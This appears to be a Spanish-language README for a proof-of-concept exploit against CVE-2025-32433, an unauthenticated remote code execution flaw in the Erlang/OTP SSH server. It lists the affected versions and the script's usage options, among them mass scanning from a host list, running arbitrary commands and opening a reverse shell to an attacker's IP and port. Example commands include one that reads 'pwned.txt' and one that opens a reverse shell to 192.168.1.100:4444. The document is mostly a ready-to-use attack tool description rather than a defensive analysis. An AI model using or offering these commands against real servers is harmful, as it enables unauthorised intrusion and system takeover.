
La vulnerabilidad permite que un atacante con acceso a la red a un servidor SSH Erlang/OTP ejecute código arbitrario sin autenticación previa.
La vulnerabilidad permite a un atacante con acceso de red a un servidor SSH de Erlang/OTP ejecutar código arbitrario sin autenticación previa.
Se ha identificado una vulnerabilidad grave en el servidor SSH de Erlang/OTP que puede permitir a un atacante realizar una ejecución remota de código (RCE) sin autenticación. Al explotar una falla en el manejo de mensajes del protocolo SSH, un actor malicioso podría obtener acceso no autorizado a los sistemas afectados y ejecutar comandos arbitrarios sin credenciales válidas. Esto podría comprometer dichos hosts, permitiendo que terceros accedan y manipulen sin autorización datos sensibles, o provocar ataques de denegación de servicio.
OTP-27.3.2 y anteriores
OTP-26.2.5.10 y anteriores
OTP-25.3.2.19 y anteriores
python cve-2025-32433.py <host> [options]
Opciones:
-p PORT, --port PORT: Puerto SSH (por defecto: 22)
-t TIMEOUT, --timeout TIMEOUT: Tiempo de espera de conexión en segundos (por defecto: 5)
-c COMMAND, --command COMMAND: Comando personalizado a ejecutar
--check: Comprueba si el objetivo es vulnerable
-u urls.txt, --urlfile urls.txt: Archivo que contiene la lista de hosts a escanear (uno por línea)
-o output.txt, --output output.txt: Archivo de salida para almacenar los resultados.
--shell: Lanzar una shell inversa
--lhost LHOST: IP del atacante para la shell inversa
--lport LPORT: Puerto del atacante para la shell inversa (por defecto: 4444)
python cve-2025-32433.py 127.0.0.1 --check
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444